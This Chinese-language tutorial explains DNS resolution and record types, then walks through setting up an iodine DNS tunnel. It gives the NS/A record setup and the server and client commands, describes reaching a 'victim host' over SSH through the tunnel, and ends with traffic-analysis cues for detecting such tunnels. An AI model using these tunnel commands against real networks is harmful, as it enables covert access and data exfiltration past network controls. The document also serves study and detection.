目录
6.1?公网环境(中继实现dns隧道,本地局域网环境,不需要这一步)
1、dns是什么
DNS是 Domain Name System 的缩写,也就是 域名解析系统,它的作用非常简单,就是根据域名查出对应的 IP地址。
2、域名的层级
主机名.次级域名.顶级域名.根域名 baike.baidu.com.root
3、dns解析过程
来自:https://mp.weixin.qq.com/s/aPa1sYBmb4j1PtyEOkipdw
- 先查找本地 DNS 缓存(自己的电脑上),有则返回,没有则进入下一步
- 查看本地 hosts 文件有没有相应的映射记录,有则返回,没有则进入下一步
- 向本地 DNS 服务器(一般都是你的网络接入服务器商提供,比如中国电信,中国移动)发送请求进行查询,本地DNS服务器收到请求后,会先查下自己的缓存记录,如果查到了直接返回就结束了,如果没有查到,本地DNS服务器就会向DNS的根域名服务器发起查询请求:请问老大, www.163.com 的ip是啥?
- 根域名服务器收到请求后,看到这是个 .com 的域名,就回信说:这个域名是由 .com 老弟管理的,你去问他好了,这是.com老弟的联系方式(ip1)。
- 本地 DNS 服务器接收到回信后,照着老大哥给的联系方式(ip1),马上给 .com 这个顶级域名服务器发起请求:请问 .com 大大,www.163.com 的ip 是啥?
- .com 顶级域名服务器接收到请求后,看到这是 163.com 的域名,就回信说:这个域名是 .163.com 老弟管理的,你就去问他就行了,这是他的联系方式(ip2)
- 本地 DNS 服务器接收到回信后,按照前辈的指引(ip2),又向 .163.com 这个权威域名服务器发起请求:请问 163.com 大大,请问 www.163.com 的ip是啥?
- 163.com 权威域名服务器接收到请求后,确认了是自己管理的域名,马上查了下自己的小本本,把 www.163.com 的ip告诉了 本地DNS服务器。
- 本地DNS服务器接收到回信后,非常地开心,这下总算拿到了www.163.com的ip了,马上把这个消息告诉了要求查询的客户(就是你的电脑)。由于这个过程比较漫长,本地DNS服务器为了节省时间,也为了尽量不去打扰各位老大哥,就把这个查询结果偷偷地记在了自己的小本本上,方便下次有人来查询时,可以快速回应。
总结起来就三句话(一会的dns现网环境隧道,就是在子域名加了一条ns记录)
- 从"根域名服务器"查到"顶级域名服务器"的NS记录和A记录(IP地址)
- 从"顶级域名服务器"查到"次级域名服务器"的NS记录和A记录(IP地址)
- 从"次级域名服务器"查出"主机名"的IP地址
4、dns缓存时间
我们在配置 DNS 解析的时候,会有一个 TTL 参数(Time To Live),意思就是这个缓存可以存活多长时间,过了这个时间,本地 DNS 就会删除这条记录,删除了缓存后,你再访问,就要重新走一遍上面的流程,获取最新的地址。
5、dns的记录类型
常见的 DNS 记录类型如下
- A Record: 域名的IPv4地址。
- AAAA Record: 域名的IPv6地址。
- CNAME Record: 域名的别名。可以理解为域名的重定向吧,主要方便IP地址的变更。比如cdn厂商会给客户企业分配固定的cname而不是IP,如果分配IP,cdn厂商做IP调整就受限哪些客户企业的哪些域名绑定了这个IP,需要沟通服务迁移。还有在企业多个域名(www/mail/ftp或其他业务分类的域名)对应一个入口IP地址时候,也可以给多个域名做cname,便于后期的IP调整。总之,别名是一种松耦合的处理办法。
- MX Record: smtp邮箱域名的IP地址。给client端指明某个域名的邮件服务器地址。
- PTR Record: 根据IP反向查找域名。
- SRV Record: 服务的IP地址记录,包含ip、port、priority、weight。
- TXT Record:域名的文本记录。可以记录联系方式、服务版本信息、反垃圾邮件等。
- NS Record: dns zone。指定哪个域名服务器可以解析该域名的子域名。
- SOA Record: 授权机构记录,记录ns中哪个是主服务器。
6、iodine搭建dns隧道
6.1?公网环境(中继实现dns隧道,本地局域网环境,不需要这一步)
第一步:添加一条NS记录
我这里的设置是dns.tutuuu.top指向dnsns.tutuuu.top,想要解析dns.tutuuu.top这个子域名,就需要去访问dnsns.tutuuu.top这个域名服务器
第二步:添加一条A记录
将域名服务器解析到咱们的控制的公网服务器IP地址,我的域名服务器是dnsns.tutuuu.top,对应的公网IP地址是123.56.6.xxx
6.2 使用iodine搭建dns隧道
-f 前台显示
-P 设置通信密码(我的密码是hackbijipasswd)
10.0.0.1 (我设置的服务器私有网址,也可以设置为其他地址)
dnsns.tutuuu.top服务端执行
iodined -fP 123passwd 10.0.0.1 dnsns.tutuuu.top可以看到服务端建立了一个10网段的dns0的网卡
客户端执行?
iodine -fP 123passwd -T txt -r 192.168.8.190 dnsns.tutuuu.top
访问10.0.0.0网段的流量都会走dns0隧道接口
查看当前路由
访问被害者主机的ssh?
7、流量分析
使用-T参数,可以指定dns传输的查询类型,下图使用的是txt类型传输
默认不加-T参数,dns隧道查询使用的是10这个type,可以作为在流量中发现dns隧道的一个判定依据。?
支持NULL,TXT,SRV,MX,CNAME,A等多种查询请求类型。?
在正常的DNS流量中。A记录类型的流量占20%-30%,CNAME记录为38%-48%,AAAA记录占25%,NS记录只有5%,TXT记录只有1%-2%。然而为了获取更高的带宽,一部分的DNS隐蔽信道工具如Iodine。在默认配置下会使用TXT或NULL等不常用的记录类型。
绿盟分析DNS隧道参考
http://blog.nsfocus.net/dns-tunnel-communication-characteristics-detection/?from=timeline
